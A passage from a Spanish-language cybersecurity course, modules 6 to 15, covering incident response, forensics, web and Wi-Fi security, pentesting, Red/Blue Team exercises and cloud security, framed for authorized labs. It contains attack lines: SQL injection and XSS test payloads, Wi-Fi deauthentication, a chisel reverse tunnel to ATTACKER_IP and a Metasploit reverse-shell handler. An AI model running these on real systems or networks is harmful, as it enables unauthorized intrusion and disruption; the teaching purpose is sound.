4. Recuperar el servicio (restaurar backups, habilitar sistemas).
5. Registrar toda la evidencia y las acciones tomadas.

✅ Trabajo Práctico del Módulo 6

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todos los pasos, capturas y registros del ejercicio.

📦 Formato de Entrega

modulo6_Apellido_Nombre.zip
    ├─ simulacion/
    │  ├─ evidencia_trafico.txt
    │  ├─ logs_detectados.txt
    ├─ respuesta/
    │  ├─ plan_respuesta.pdf
    └─ informe/
    └─ post_mortem.txt

📏 Rúbrica de Evaluación

• Simulación (30%): Evidencia clara del ejercicio realizado.
• Respuesta (40%): Procedimientos coherentes y documentados.
• Informe (30%): Análisis de lecciones aprendidas y mejoras propuestas.

📝 Checklist de Entrega

• [ ] Evidencia de simulación controlada.
• [ ] Registros/logs del incidente.
• [ ] Documento de plan de respuesta ejecutado.
• [ ] Informe post-mortem con acciones de mejora.

⚠️ Notas éticas y accesibilidad

• Ejecutar simulaciones solo en entornos autorizados.
• No generar impactos reales en sistemas de producción.
• Anonimizar datos sensibles en evidencias e informes.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27035 (Gestión de Incidentes), NIST CSF (Detect: DE.AE, DE.CM, DE.DP; Respond: RS.RP, RS.MI, RS.CO) y CIS Controls v8 (17, 18), reforzando la preparación ante incidentes reales.

🚀 Cierre del Módulo

Ahora dominas la ejecución de simulaciones de incidentes y planes de respuesta. En el próximo módulo abordarás Investigación Forense Digital para profundizar en el análisis post-incidente.

🏛️ Módulo 7: Investigación Forense Digital

En este módulo aprenderás a realizar análisis forense digital para recolectar, preservar y examinar evidencias en sistemas comprometidos. Aplicarás metodologías reconocidas y herramientas especializadas para asegurar la integridad y validez de la información.

• Recolectar evidencias digitales sin alterarlas.
• Preservar la cadena de custodia.
• Analizar discos, memoria RAM y logs.
• Generar informes técnicos y ejecutivos.

📚 Glosario Técnico

• Cadena de custodia: Procedimiento para documentar quién tuvo acceso a la evidencia, cuándo y por qué.
• Hash criptográfico: Valor único que asegura la integridad de un archivo.
• Imagen forense: Copia bit a bit de un medio digital.
• Volcado de memoria: Captura completa del contenido de la RAM.

🧰 Prerrequisitos del laboratorio

• Entorno controlado con sistemas de prueba comprometidos.
• Herramientas forenses (ej.: Autopsy, FTK Imager, Volatility, Sleuth Kit).
• Almacenamiento externo para evidencias.

🛠️ Laboratorio 1 — Creación de imagen forense

Fundamento: Una imagen forense permite trabajar sin modificar la evidencia original.

        # Crear imagen forense con dd
        sudo dd if=/dev/sdX of=/mnt/externo/disk_image.dd bs=4M conv=noerror,sync

        # Calcular hash para integridad
        sha256sum /mnt/externo/disk_image.dd > hash.txt
      

        # Usar FTK Imager para crear imagen forense (interfaz gráfica)
        # O con herramientas CLI como dc3dd (instalación previa requerida)
      

🛠️ Laboratorio 2 — Análisis de imagen y memoria

Fundamento: Examinar archivos, registros y memoria en busca de indicios de actividad maliciosa.

1. Abrir la imagen en Autopsy o Sleuth Kit y revisar:
   • Archivos modificados recientemente.
   • Restos de malware o ejecutables sospechosos.
   • Historial de navegación y correos electrónicos.
2. Con Volatility, analizar un volcado de memoria:

   
           volatility -f memoria.vmem --profile=Win10x64_19041 pslist
         

✅ Trabajo Práctico del Módulo 7

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todas las evidencias, análisis y reporte final.

📦 Formato de Entrega

modulo7_Apellido_Nombre.zip
    ├─ imagen/
    │  ├─ disk_image.dd
    │  ├─ hash.txt
    ├─ memoria/
    │  ├─ memoria.vmem
    │  ├─ analisis_volatility.txt
    └─ informe/
       └─ reporte_forense.pdf

📏 Rúbrica de Evaluación

• Adquisición (30%): Evidencia de imagen forense y hash.
• Análisis (40%): Identificación de artefactos y hallazgos relevantes.
• Informe (30%): Documentación clara y estructurada.

📝 Checklist de Entrega

• [ ] Imagen forense creada y verificada con hash.
• [ ] Volcado de memoria y análisis realizados.
• [ ] Informe con conclusiones y capturas.

⚠️ Notas éticas y accesibilidad

• No acceder a datos personales sin autorización expresa.
• Proteger y encriptar las evidencias almacenadas.
• Anonimizar información sensible en informes.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27037 (Directrices para identificación, recolección, adquisición y preservación de evidencias digitales), NIST SP 800-86 (Guide to Integrating Forensic Techniques into Incident Response) y CIS Controls v8 (8, 13, 17), asegurando que los procesos forenses cumplan estándares internacionales.

🚀 Cierre del Módulo

Con estas habilidades podrás llevar a cabo investigaciones forenses digitales completas y documentadas, fortaleciendo la respuesta y prevención ante incidentes. El siguiente módulo se centrará en Pruebas de Penetración Ética para evaluar la seguridad de sistemas de manera proactiva.

🏛️ Módulo 8: Seguridad en Aplicaciones Web

En este módulo aprenderás a identificar, evaluar y mitigar vulnerabilidades comunes en aplicaciones web. Utilizaremos entornos de prueba seguros (DVWA, Juice Shop) y herramientas como OWASP ZAP y Burp Suite, siguiendo las mejores prácticas del OWASP Top 10 y normas internacionales.

🧰 Prerrequisitos del laboratorio

• Instalar OWASP ZAP o Burp Suite Community.
• Entorno vulnerable local (por ejemplo: DVWA o OWASP Juice Shop).
• Navegador web compatible (Firefox/Chrome) y conocimientos básicos de HTTP/HTML.

🎯 Objetivos de Aprendizaje

• Comprender el OWASP Top 10 y sus implicancias.
• Realizar pruebas de inyección SQL, XSS y CSRF en entornos controlados.
• Analizar el flujo de autenticación y autorización.
• Generar un reporte técnico con hallazgos y recomendaciones.

📚 Glosario Técnico

• SQL Injection (SQLi): Técnica para manipular consultas SQL a través de entradas de usuario.
• Cross-Site Scripting (XSS): Inyección de scripts maliciosos en páginas vistas por otros usuarios.
• CSRF: Ataque que fuerza a un usuario autenticado a ejecutar acciones no deseadas.
• OWASP Top 10: Lista de las principales vulnerabilidades en aplicaciones web.

📚 Marco teórico (síntesis)

Las aplicaciones web son uno de los vectores más comunes de ataque. El proyecto OWASP documenta las principales amenazas y contramedidas. Las pruebas deben realizarse únicamente en entornos de laboratorio, siguiendo metodologías como OWASP Testing Guide.

🛠️ Laboratorio 1 — Escaneo inicial con OWASP ZAP

Configura un proxy en tu navegador para dirigir el tráfico a OWASP ZAP y realiza un escaneo pasivo sobre DVWA o Juice Shop.

# Paso 1 — Abrir OWASP ZAP
# Paso 2 — Configurar navegador con proxy HTTP 127.0.0.1:8080
# Paso 3 — Navegar por toda la app para capturar tráfico
# Paso 4 — Analizar alertas generadas
  

🕵️‍♂️ Laboratorio 2 — Pruebas de Inyección SQL

En DVWA (nivel bajo), utiliza entradas como ' OR '1'='1 para manipular consultas y observa el resultado.

💻 Laboratorio 3 — Pruebas XSS

Inserta un payload como <script>alert('XSS')</script> en formularios y verifica su ejecución.

📋 Trabajo Práctico del Módulo 8

📦 Instrucciones de entrega

1. Documentar al menos 3 vulnerabilidades encontradas (tipo, ubicación, prueba realizada, evidencia).
2. Proponer una mitigación para cada hallazgo.
3. Generar un reporte en formato PDF con capturas y análisis.

📦 Formato de Entrega

    modulo8_Apellido_Nombre.zip
    ├─ evidencias/
    │  ├─ capturas/
    │  └─ report.pdf
    └─ notas.txt
  

📏 Rúbrica de Evaluación

• Identificación de vulnerabilidades: 40%
• Evidencia clara y reproducible: 30%
• Propuestas de mitigación: 20%
• Presentación del reporte: 10%

✅ Checklist de Calidad

• ¿Las pruebas fueron hechas en entorno controlado?
• ¿Se documentó el payload exacto usado?
• ¿Se propuso mitigación específica?
• ¿El reporte es claro y sin datos sensibles?

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con el OWASP Top 10, ISO/IEC 27034 (Seguridad en aplicaciones), y el pilar Protect del NIST Cybersecurity Framework. Refuerza competencias en pruebas seguras y documentación técnica.

🚀 Cierre del Módulo

Has completado el Módulo 8. Ahora estás listo para aplicar técnicas de análisis y protección de aplicaciones web de forma profesional y ética.

🏛️ Módulo 9: Seguridad en Redes Inalámbricas

En este módulo aprenderás a evaluar la seguridad de redes Wi-Fi, identificar configuraciones inseguras y aplicar contramedidas efectivas. Trabajaremos con herramientas de auditoría inalámbrica en entornos controlados y analizaremos protocolos como WEP, WPA, WPA2 y WPA3.

🧰 Prerrequisitos del laboratorio

• Tarjeta de red inalámbrica compatible con modo monitor.
• Distribución Linux orientada a seguridad (ej. Kali Linux) o adaptadores USB compatibles en Windows.
• Herramientas: aircrack-ng, airodump-ng, aireplay-ng, wireshark.
• Entorno de laboratorio con un punto de acceso de prueba configurado por el estudiante.

🎯 Objetivos de Aprendizaje

• Identificar protocolos y cifrados inalámbricos.
• Detectar configuraciones inseguras (SSID abierto, WEP, WPA débil).
• Capturar y analizar handshakes WPA/WPA2.
• Proponer endurecimiento de seguridad Wi-Fi.

📚 Glosario Técnico

• Modo monitor: Permite a la tarjeta de red capturar todo el tráfico inalámbrico.
• Handshake: Intercambio inicial de autenticación WPA/WPA2.
• SSID: Nombre de la red inalámbrica.
• WPA/WPA2/WPA3: Protocolos de seguridad Wi-Fi con distintas mejoras en cifrado y autenticación.

📚 Marco teórico (síntesis)

Las redes inalámbricas son vulnerables a ataques de escucha pasiva, suplantación de AP y fuerza bruta. La elección del protocolo y configuración influye directamente en la resistencia a ataques. WPA3 introduce mejoras como SAE, pero su adopción aún es gradual.

🛠️ Laboratorio 1 — Detección y análisis de redes

        # Activar modo monitor
        sudo airmon-ng start wlan0

        # Escanear redes
        sudo airodump-ng wlan0mon
  

Identifica redes abiertas o con cifrados inseguros y anota su BSSID, canal y protocolo.

🕵️‍♂️ Laboratorio 2 — Captura de handshakes

        # Capturar handshakes WPA/WPA2
        sudo airodump-ng --bssid <BSSID> -c <canal> -w captura wlan0mon

        # (Opcional) Forzar reautenticación
        sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon
  

Guarda el archivo captura.cap para análisis posterior en Wireshark o con aircrack-ng.

🔍 Laboratorio 3 — Análisis de tráfico inalámbrico

Abre captura.cap en Wireshark, filtra por eapol y analiza el intercambio de autenticación.

📋 Trabajo Práctico del Módulo 9

📦 Instrucciones de Entrega

1. Realizar detección de redes y clasificar según seguridad (abierta, WEP, WPA, WPA2, WPA3).
2. Capturar un handshake WPA2 y documentar el proceso (sin crackear contraseñas reales).
3. Proponer mejoras de configuración para una red insegura detectada.

📦 Formato de Entrega

    modulo9_Apellido_Nombre.zip
    ├─ capturas/
    │  ├─ listado_redes.txt
    │  ├─ captura.cap
    │  └─ evidencias.png
    └─ recomendaciones.txt
  

📏 Rúbrica de Evaluación

• Detección y clasificación de redes: 30%
• Captura de handshake documentada: 30%
• Propuestas de mitigación: 30%
• Presentación y orden: 10%

✅ Checklist de Calidad

• ¿Solo se trabajó en un entorno autorizado?
• ¿Las evidencias son claras y reproducibles?
• ¿Las recomendaciones son aplicables y realistas?

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27033 (Seguridad en redes), NIST SP 800-153 (Guía para seguridad de redes inalámbricas) y el pilar Protect del NIST Cybersecurity Framework. Refuerza habilidades prácticas en protección de entornos Wi-Fi.

🚀 Cierre del Módulo

Has completado el Módulo 9. Ahora dominas las técnicas para evaluar y mejorar la seguridad de redes inalámbricas de forma controlada y ética.

🏛️ Módulo 10: Análisis Forense Digital Básico

En este módulo aprenderás a preservar, adquirir y analizar evidencias digitales en un entorno controlado, siguiendo las mejores prácticas de la disciplina forense y garantizando la cadena de custodia. Nos centraremos en análisis de discos, memoria y registros de sistema usando herramientas libres.

• Preservar evidencia digital siguiendo procedimientos forenses.
• Realizar adquisición bit a bit de discos y memorias.
• Verificar integridad de evidencias mediante hash.
• Analizar artefactos comunes: registros, archivos borrados, logs de eventos.

📚 Glosario Técnico

• Cadena de custodia: Registro documentado del manejo de la evidencia.
• Imagen forense: Copia bit a bit de un medio digital preservando su estado.
• Hash criptográfico: Valor único que verifica la integridad de un archivo.

🧰 Prerrequisitos del laboratorio

• Autorización previa para el análisis de sistemas y datos.
• Sistema Linux (Kali, Ubuntu Forensics) o Windows con herramientas instaladas.
• Herramientas: dd, dcfldd, Autopsy, Volatility, hashdeep.

🛠️ Laboratorio 1 — Adquisición de disco

Fundamento: La adquisición bit a bit preserva la integridad del medio original para análisis posterior.

        # Listar discos
        lsblk

        # Crear imagen forense con dcfldd
        sudo dcfldd if=/dev/sdb of=imagen_sdb.dd hash=sha256 hashlog=hash.txt

        # Verificar hash
        sha256sum imagen_sdb.dd
      

        # Usar FTK Imager para adquirir disco en formato E01
        # Verificar hash SHA256 al finalizar
      

🛠️ Laboratorio 2 — Análisis de imagen

Fundamento: Analizar una copia forense evita modificaciones sobre la evidencia original.

1. Abrir Autopsy → New Case → Add Data Source → Disk Image.
2. Explorar artefactos: archivos borrados, historial de navegación, metadatos.
3. Exportar hallazgos relevantes y documentarlos.

🛠️ Laboratorio 3 — Análisis de memoria RAM

Fundamento: El análisis de memoria permite identificar procesos y conexiones activas al momento de la captura.

        # Identificar perfil
        volatility -f memoria.raw imageinfo

        # Listar procesos activos
        volatility -f memoria.raw --profile=Win10x64_19041 pslist

        # Buscar conexiones de red
        volatility -f memoria.raw --profile=Win10x64_19041 netscan
  

✅ Trabajo Práctico del Módulo 10

📦 Instrucciones de Entrega

Entrega un único archivo comprimido con todas las evidencias, análisis y reporte final del ejercicio.

📦 Formato de Entrega

modulo10_Apellido_Nombre.zip
    ├─ disco/
    │  ├─ imagen_sdb.dd
    │  ├─ hash.txt
    ├─ memoria/
    │  ├─ memoria.raw
    │  ├─ analisis_memoria.txt
    └─ informe/
       └─ reporte_forense.pdf

📏 Rúbrica de Evaluación

• Adquisición (30%): Evidencia de imagen forense y hash.
• Análisis (40%): Identificación de artefactos y hallazgos relevantes.
• Informe (30%): Documentación clara y estructurada.

📝 Checklist de Entrega

• [ ] Imagen forense creada y verificada con hash.
• [ ] Volcado de memoria y análisis realizados.
• [ ] Informe con conclusiones y capturas.

⚠️ Notas éticas y accesibilidad

• No acceder a datos personales sin autorización expresa.
• Proteger y encriptar las evidencias almacenadas.
• Anonimizar información sensible en informes.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con ISO/IEC 27037 (Directrices para identificación, recolección y preservación de evidencias digitales), NIST SP 800-86 (Guide to Integrating Forensic Techniques into Incident Response) y CIS Controls v8 (8, 13, 17), asegurando que los procesos forenses cumplan estándares internacionales.

🚀 Cierre del Módulo

Ahora dominas los fundamentos del análisis forense digital: preservar, adquirir y examinar evidencias sin alterar su integridad. Esto te permitirá integrarte en equipos de respuesta a incidentes y colaborar con procesos legales y auditorías técnicas.

🏛️ Módulo 11: Análisis de Tráfico Avanzado

En este módulo aprenderás a capturar, filtrar y analizar tráfico de red utilizando herramientas avanzadas como Wireshark y tcpdump. Trabajaremos con escenarios controlados para detectar patrones de ataque, identificar fugas de información y validar configuraciones de seguridad.

🎯 Objetivos de Aprendizaje

• Capturar tráfico de red de forma controlada y legal.
• Aplicar filtros básicos y avanzados en Wireshark y tcpdump.
• Detectar patrones sospechosos y flujos no autorizados.
• Exportar y documentar hallazgos en formatos estándar.

📚 Glosario Técnico

• PCAP: Archivo de captura de paquetes.
• Filtro de captura: Expresión que limita el tráfico almacenado durante la captura.
• Filtro de visualización: Expresión que limita el tráfico mostrado, sin afectar la captura original.
• Flow: Secuencia de paquetes con 5 tuplas: IP origen/destino, puerto origen/destino y protocolo.

📚 Marco Teórico

El análisis de tráfico es esencial para la detección de intrusiones, resolución de problemas y auditorías de seguridad. Wireshark ofrece un entorno gráfico para inspeccionar paquetes en detalle, mientras que tcpdump es ideal para capturas rápidas o entornos sin interfaz gráfica.

🛠️ Laboratorio 1 — Captura básica de tráfico

        # Instalar tcpdump si no está presente
        sudo apt update && sudo apt install -y tcpdump

        # Capturar 100 paquetes en la interfaz eth0
        sudo tcpdump -i eth0 -c 100 -w captura.pcap
      

        # Descargar e instalar Wireshark desde https://www.wireshark.org
        # Capturar tráfico en la interfaz deseada y guardar en un archivo .pcap
      

🕵️‍♂️ Laboratorio 2 — Filtros avanzados en Wireshark

• Mostrar solo tráfico HTTP: http
• Filtrar por dirección IP: ip.addr == 192.168.1.50
• Filtrar por puerto: tcp.port == 443

📋 Trabajo Práctico del Módulo 11

📦 Instrucciones de Entrega

Realiza una captura de tráfico de al menos 5 minutos en un entorno controlado y documenta:

1. Protocolo más utilizado.
2. Top 5 de IPs origen/destino.
3. Posibles eventos sospechosos (justifica).

📦 Formato de Entrega

    modulo11_Apellido_Nombre.zip
    ├── captura.pcap
    ├── analisis.pdf
    └── resumen.txt
  

📏 Rúbrica

• Captura válida y reproducible (30%).
• Análisis técnico correcto (40%).
• Documentación clara y completa (30%).

✅ Checklist

• ¿Capturaste tráfico solo en un entorno permitido?
• ¿Aplicaste filtros para aislar el tráfico relevante?
• ¿Guardaste la evidencia en formato .pcap?

🔒 Notas Éticas

• No captures tráfico en redes ajenas o sin consentimiento.
• Anonimiza datos sensibles antes de compartir evidencia.

📘 Conexión con Estándares (Contexto Professional)

Este módulo se alinea con NIST CSF (DE.CM-1, DE.CM-7) y ISO/IEC 27002 (monitorización y análisis de eventos).

🚀 Cierre del Módulo

Ahora dominas la captura y análisis de tráfico para detectar incidentes y validar la seguridad de tu red. En el siguiente módulo aplicarás estos conocimientos para crear alertas y automatizar la detección.

🏛️ Módulo 12: Gestión de Incidentes Avanzada

En este módulo profundizaremos en la respuesta ante incidentes de ciberseguridad, integrando análisis forense, coordinación de equipos y comunicación efectiva con stakeholders. Aprenderás a manejar incidentes críticos, priorizar recursos y documentar cada fase del ciclo.

🧰 Prerrequisitos del laboratorio

• Entorno de laboratorio seguro (máquinas virtuales o simuladores) con un SIEM y/o SOAR configurado.
• Herramientas de monitoreo y respuesta: SIEM (ej. Wazuh, Splunk), SOAR (ej. TheHive, Cortex), utilidades forenses.
• Roles y responsabilidades definidos para el equipo de gestión de incidentes.
• Autorización formal para realizar simulaciones de incidentes.

🎯 Objetivos de Aprendizaje

• Aplicar el ciclo de gestión de incidentes (detección, análisis, contención, erradicación, recuperación y lecciones aprendidas).
• Integrar herramientas SIEM y SOAR en la respuesta.
• Coordinar tareas con equipos técnicos, legales y de comunicación.
• Documentar incidentes para uso legal y auditorías.

📚 Glosario Técnico

• SIEM: Sistema de gestión de eventos e información de seguridad.
• SOAR: Plataforma de orquestación, automatización y respuesta en seguridad.
• IOC: Indicador de Compromiso.
• Cadena de custodia: Procedimientos para preservar la integridad de evidencias digitales.

🛠️ Laboratorio — Simulación de incidente crítico

Fundamento: Practicar la coordinación y respuesta rápida en incidentes reales.

1. Utiliza un entorno de laboratorio (VM o simulador) con un SIEM configurado.
2. Genera alertas simuladas (p. ej., intentos de acceso no autorizado, malware detectado).
3. Clasifica el incidente según severidad y tipo.
4. Ejecuta acciones de contención y erradicación documentando cada paso.
5. Exporta un informe con línea de tiempo, acciones y resultados.

📋 Trabajo Práctico del Módulo 12

1. Preparar un procedimiento documentado para la gestión de un incidente crítico.
2. Simular un incidente y registrar la respuesta (capturas y logs).
3. Entregar un informe final con:
   • Descripción del incidente
   • Indicadores de compromiso detectados
   • Acciones realizadas y responsables
   • Resultados y recomendaciones

📦 Formato de Entrega

Sube un archivo modulo12_Apellido_Nombre.zip con:

modulo12_Apellido_Nombre.zip
    ├─ procedimiento_incidente.pdf
    ├─ simulacion/
    │  ├─ capturas/
    │  └─ logs/
    └─ informe_final.pdf

📏 Rúbrica de Evaluación

• Procedimiento (30%) — Claridad, coherencia y aplicabilidad.
• Simulación (30%) — Realismo y cobertura de todas las fases.
• Informe (40%) — Documentación completa, conclusiones y recomendaciones.

✅ Checklist de Calidad

• ¿Todas las fases del ciclo de incidentes fueron cubiertas?
• ¿La evidencia fue preservada siguiendo cadena de custodia?
• ¿Se identificaron correctamente los IOCs?
• ¿El informe final es claro y entendible por un público no técnico?

⚠️ Notas éticas y accesibilidad

• No ejecutar simulaciones en entornos productivos.
• Proteger la información sensible y anonimizar datos antes de compartirlos.
• Garantizar que todo el personal involucrado cuente con la autorización correspondiente.

📘 Conexión con Estándares (contexto profesional)

Este módulo está alineado con ISO/IEC 27035 (Gestión de incidentes de seguridad de la información), NIST SP 800-61 (Computer Security Incident Handling Guide) y el pilar Respond del NIST Cybersecurity Framework.

🚀 Cierre del Módulo

Con este módulo, estarás preparado para liderar la gestión de incidentes complejos, minimizando el impacto y fortaleciendo la resiliencia de la organización.

🏛️ Módulo 13: Pruebas de Penetración Avanzadas (Pentesting Pro)

En este módulo llevarás tus habilidades ofensivas al siguiente nivel aplicando metodologías formales (PTES/OSSTMM), técnicas de pivoting y post-explotación en entornos controlados. Practicarás desde el reconocimiento profundo hasta la elaboración de un informe ejecutivo y técnico con evidencias reproducibles.

🎯 Objetivos de Aprendizaje

• Planificar y ejecutar un pentest avanzado con reglas de compromiso claras.
• Realizar reconocimiento activo y pasivo, explotación y post-explotación básica.
• Pivotar entre subredes de laboratorio y consolidar acceso.
• Redactar informes profesionales para audiencias técnicas y ejecutivas.

📚 Glosario Técnico

• PTES: Penetration Testing Execution Standard.
• OSSTMM: Open Source Security Testing Methodology Manual.
• Pivoting: Técnica para alcanzar redes internas a través de un host comprometido del que tienes control en laboratorio.
• C2 (Command & Control): Canal para gestionar sesiones/implantes en un entorno de pruebas autorizado.
• OPSEC: Prácticas para minimizar huella y evitar disrupciones en ejercicios controlados.

🧰 Prerrequisitos del laboratorio

• Autorización por escrito y entorno aislado (VMs, redes de laboratorio).
• Sistema base con Kali/Parrot o Linux con herramientas equivalentes.
• Conectividad entre al menos dos subredes de laboratorio (para pivoting).
• Herramientas sugeridas: nmap, feroxbuster, metasploit-framework, proxychains, sshuttle, chisel, crackmapexec, bloodhound, neo4j.

🛠️ Laboratorio 1 — Reconocimiento y mapeo de superficie

        # Descubrimiento inicial (TCP SYN + detección de versiones) en laboratorio
        sudo nmap -sS -sV -O -T3 -p- 10.10.0.0/24 -oA recon_inicial

        # Fuzzing de contenido web (si aplica)
        feroxbuster -u http://10.10.0.15 -w /usr/share/wordlists/dirb/common.txt -o ferox_10.10.0.15.txt
      

        # Verificar conectividad y puertos comunes desde Windows (laboratorio)
        Test-NetConnection 10.10.0.15 -Port 80
        Test-NetConnection 10.10.0.15 -Port 445

        # Enumeración básica de recursos compartidos (autorizado)
        Get-SmbShare -CimSession 10.10.0.15
      

🛠️ Laboratorio 2 — Explotación controlada y obtención de acceso

1. Identifica un objetivo de prueba dentro del rango del laboratorio y valida versión/servicio.
2. Usa un flujo seguro (por ejemplo, Metasploit con módulos de prueba o PoC no destructivos) y registra cada acción.
3. Obtén una sesión de prueba (shell limitada) y documenta usuario/privilegios y restricciones.

        # Ejemplo de flujo con Metasploit (laboratorio)
        msfconsole -q -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 10.10.0.15; run; exit"

        # Túnel simple para prueba de pivoting con chisel (lab)
        # En atacante:
        chisel server -p 9001 --reverse
        # En host intermedio (comprometido de laboratorio):
        chisel client ATTACKER_IP:9001 R:1080:socks
        # Luego enruta herramientas a través de SOCKS con proxychains
        proxychains nmap -sT -Pn 10.20.0.0/24 -oA pivot_scan
      

        # Verificar privilegios y contexto en una sesión de prueba
        whoami /priv
        ipconfig /all

        # Túnel de laboratorio con sshuttle (desde WSL o Linux auxiliar)
        # sshuttle -r usuario@10.10.0.15 10.20.0.0/24
      

🛠️ Laboratorio 3 — Post-explotación segura y enumeración

• Enumera usuarios, servicios y rutas potenciales de movimiento lateral.
• Recolecta solo artefactos permitidos por las reglas del ejercicio (sin datos personales reales).
• Demuestra persistencia benigna y revierte cambios al finalizar.

        # Enumeración de servicios y compartidos (lab)
        crackmapexec smb 10.10.0.0/24 --shares

        # Grafo de relaciones AD (si tu lab incluye AD)
        # Ingerir datos con SharpHound y analizarlos en BloodHound/Neo4j
  

⚠️ Errores Comunes

• No definir alcance ni reglas de compromiso por escrito.
• Usar pruebas destructivas o sin respaldo en laboratorio.
• No registrar evidencia, parámetros y tiempos de cada acción.
• Olvidar revertir cambios/post-explotación al finalizar.

📋 Trabajo Práctico del Módulo 13

📦 Instrucciones de Entrega

1. Planifica un pentest de laboratorio (alcance, objetivos, limitaciones, OPSEC).
2. Ejecuta reconocimiento, explotación controlada y un pivoting sencillo entre subredes del lab.
3. Realiza post-explotación no destructiva y reúne evidencias (capturas, comandos, hashes).
4. Entrega dos informes: uno técnico detallado y uno ejecutivo con riesgos y recomendaciones.

📦 Formato de Entrega

modulo13_Apellido_Nombre.zip
    ├─ plan/
    │  └─ alcance_ROE.pdf
    ├─ evidencia/
    │  ├─ recon_inicial.nmap
    │  ├─ ferox_*.txt
    │  ├─ pivot_scan.nmap
    │  └─ capturas/
    ├─ comandos/
    │  └─ historial.txt
    └─ informes/
    ├─ informe_tecnico.pdf
    └─ informe_ejecutivo.pdf

📏 Rúbrica de Evaluación

• Planificación (25%)
• Ejecución (35%)
• Pivoting & Post-explotación (20%)
• Informes (20%)

✅ Checklist de Entrega

• ROE y alcance firmados para el laboratorio.
• Evidencias de recon, explotación controlada y pivoting.
• Comandos y parámetros documentados.
• Informes técnico y ejecutivo completos.
• Reversión de cambios realizada y documentada.

🔒 Notas éticas y accesibilidad

• Prohibido ejecutar fuera del entorno de laboratorio o sin autorización.
• Evita PoC destructivos; prioriza pruebas seguras y reversibles.
• Anonimiza cualquier dato sensible del lab en los informes.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con PTES, OSSTMM y con CIS Controls v8 (Control 18: Pruebas de Penetración).

🚀 Cierre del Módulo

Ahora cuentas con un flujo de pentesting profesional en un entorno seguro. En el próximo módulo abordarás Red Team vs Blue Team para integrar ejercicios adversariales y defensa activa.

🏛️ Módulo 14: Red Team vs Blue Team — Ejercicios Adversariales y Defensa Activa

En este módulo aprenderás cómo se desarrollan y ejecutan ejercicios de Red Team (ataque simulado) y Blue Team (defensa activa) en un entorno controlado. Pondrás en práctica tácticas ofensivas y defensivas, fomentando la colaboración y el aprendizaje bidireccional para fortalecer la postura de seguridad de la organización.

🎯 Objetivos de Aprendizaje

• Comprender los roles, responsabilidades y objetivos de Red Team y Blue Team.
• Planificar y ejecutar ejercicios adversariales con alcance y reglas claras.
• Desarrollar técnicas de detección, análisis y respuesta ante ataques simulados.
• Fomentar la retroalimentación entre equipos para mejorar procesos y controles.

📚 Glosario Técnico

• Red Team: Equipo que simula ataques reales para evaluar la seguridad.
• Blue Team: Equipo que detecta, responde y mitiga ataques.
• Purple Team: Modelo colaborativo que integra Red y Blue Team para optimizar defensas.
• Rules of Engagement (ROE): Documento que define alcance, objetivos y limitaciones de un ejercicio.

🧰 Prerrequisitos del laboratorio

• Entorno de laboratorio con al menos dos redes segmentadas (ataque/defensa).
• Herramientas de Red Team: nmap, metasploit, cobalt strike (demo), chisel.
• Herramientas de Blue Team: ELK Stack, Wazuh, Security Onion, Wireshark.
• Equipo de comunicación y registro de eventos (wiki interna, planillas, ticketing).

🛠️ Laboratorio 1 — Ejercicio Red Team

1. Revisar el ROE y confirmar objetivos con el Blue Team.
2. Realizar reconocimiento de la red objetivo dentro del alcance.
3. Ejecutar explotación controlada y demostrar acceso sin causar daño.
4. Registrar comandos, resultados y evidencias.

        # Escaneo controlado
        nmap -sV -T3 -p- 10.10.50.0/24 -oA redteam_scan

        # Explotación de prueba (ejemplo en laboratorio)
        msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; run"
      

        # Monitoreo de eventos en tiempo real con Wazuh
        tail -f /var/ossec/logs/alerts/alerts.json | jq '.rule.description'

        # Análisis de tráfico sospechoso con Wireshark
        wireshark -i eth0
      

🛠️ Laboratorio 2 — Ejercicio Blue Team

1. Identificar actividad sospechosa generada por el Red Team.
2. Correlacionar eventos con datos de SIEM y análisis de tráfico.
3. Responder aplicando reglas de firewall, aislamiento o bloqueo según el ROE.
4. Generar un informe con hallazgos y acciones tomadas.

⚠️ Errores Comunes

• No seguir el ROE acordado, causando interrupciones no planeadas.
• Falta de registro de evidencias y comunicación entre equipos.
• Exceso de confianza en herramientas sin análisis humano.

📋 Trabajo Práctico del Módulo 14

1. Definir el ROE y el alcance del ejercicio Red vs Blue.
2. Ejecutar el ejercicio siguiendo las fases planificadas.
3. Documentar acciones, evidencias y métricas de detección y respuesta.
4. Elaborar un informe conjunto con mejoras propuestas.

📦 Formato de Entrega

modulo14_Apellido_Nombre.zip
    ├─ roe.pdf
    ├─ evidencias/
    │  ├─ redteam/
    │  └─ blueteam/
    └─ informe_final.pdf

📏 Rúbrica de Evaluación

• Planificación (20%)
• Ejecución Red Team (25%)
• Ejecución Blue Team (25%)
• Informe conjunto (30%)

✅ Checklist de Entrega

• ROE firmado y respetado.
• Evidencias completas de Red y Blue Team.
• Informe con lecciones aprendidas y mejoras propuestas.

📘 Conexión con Estándares (contexto profesional)

Este módulo se alinea con NIST SP 800-84 (Guide to Test, Training, and Exercise Programs), MITRE ATT&CK Framework y el pilar Respond & Recover del NIST Cybersecurity Framework.

🚀 Cierre del Módulo

Con la experiencia en Red Team y Blue Team, estás listo para participar en simulaciones avanzadas y mejorar continuamente las defensas de cualquier entorno.

🏛️ Módulo 15: Seguridad en la Nube y DevSecOps

En este módulo aprenderás a proteger entornos en la nube (AWS, Azure, GCP) y a integrar la seguridad en todo el ciclo de desarrollo (DevSecOps). Verás cómo aplicar controles preventivos, monitoreo continuo y automatización de seguridad en pipelines CI/CD, asegurando que las aplicaciones y datos estén protegidos desde la fase de diseño hasta la producción.

🎯 Objetivos de Aprendizaje

• Comprender los modelos de responsabilidad compartida en la nube.
• Implementar medidas de seguridad en AWS, Azure y GCP (IAM, cifrado, redes).
• Configurar alertas y monitoreo en entornos cloud.
• Integrar escaneo de seguridad en pipelines CI/CD (DevSecOps).

📚 Glosario Técnico

• Responsabilidad compartida: Modelo que define qué aspectos de la seguridad corresponden al proveedor cloud y cuáles al cliente.
